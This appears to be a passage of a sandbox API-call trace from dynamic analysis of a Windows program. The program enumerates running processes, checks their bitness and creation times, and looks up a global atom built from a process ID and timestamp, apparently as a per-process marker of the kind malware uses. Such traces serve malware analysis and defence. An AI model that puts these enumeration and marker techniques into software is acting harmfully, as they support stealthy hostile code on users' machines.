	[0126.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d4c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.244] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.244] CloseHandle (hObject=0x69c) returned 1
	[0126.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d4a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.244] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.244] CloseHandle (hObject=0x69c) returned 1
	[0126.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.245] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.245] CloseHandle (hObject=0x69c) returned 1
	[0126.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.245] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.245] CloseHandle (hObject=0x69c) returned 1
	[0126.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.245] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.245] CloseHandle (hObject=0x69c) returned 1
	[0126.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.246] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.246] CloseHandle (hObject=0x69c) returned 1
	[0126.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.246] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.246] CloseHandle (hObject=0x69c) returned 1
	[0126.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d368, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.246] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.247] CloseHandle (hObject=0x69c) returned 1
	[0126.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.247] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.247] CloseHandle (hObject=0x69c) returned 1
	[0126.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d368, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.247] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.247] CloseHandle (hObject=0x69c) returned 1
	[0126.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.248] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.248] CloseHandle (hObject=0x69c) returned 1
	[0126.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b97a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.248] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.248] CloseHandle (hObject=0x69c) returned 1
	[0126.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.248] GetLastError () returned 0x5
	[0126.248] GetLastError () returned 0x5
	[0126.248] GetLastError () returned 0x5
	[0126.248] GetLastError () returned 0x5
	[0126.248] GetLastError () returned 0x5
	[0126.248] GetLastError () returned 0x5
	[0126.248] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.249] GetLastError () returned 0x5
	[0126.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.250] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.250] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.250] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.251] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.252] GetLastError () returned 0x5
	[0126.253] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.253] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.253] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.253] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.253] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.253] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.253] CloseHandle (hObject=0x69c) returned 1
	[0126.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.254] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.254] CloseHandle (hObject=0x69c) returned 1
	[0126.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.254] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.254] CloseHandle (hObject=0x69c) returned 1
	[0126.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.254] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.255] CloseHandle (hObject=0x69c) returned 1
	[0126.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.255] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.255] CloseHandle (hObject=0x69c) returned 1
	[0126.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5b08, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.255] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.255] CloseHandle (hObject=0x69c) returned 1
	[0126.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d2a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16d78) returned 0xc0000004
	[0126.286] VirtualAlloc (lpAddress=0x0, dwSize=0x16e78, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0126.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16e78, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0126.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0126.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5970, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.291] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.291] CloseHandle (hObject=0x69c) returned 1
	[0126.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d4c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.292] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.292] CloseHandle (hObject=0x69c) returned 1
	[0126.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d2a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.292] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.292] CloseHandle (hObject=0x69c) returned 1
	[0126.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.292] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.293] CloseHandle (hObject=0x69c) returned 1
	[0126.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.293] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.293] CloseHandle (hObject=0x69c) returned 1
	[0126.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.293] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.293] CloseHandle (hObject=0x69c) returned 1
	[0126.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.294] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.294] CloseHandle (hObject=0x69c) returned 1
	[0126.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.294] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.294] CloseHandle (hObject=0x69c) returned 1
	[0126.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.295] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.295] CloseHandle (hObject=0x69c) returned 1
	[0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.295] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.295] CloseHandle (hObject=0x69c) returned 1
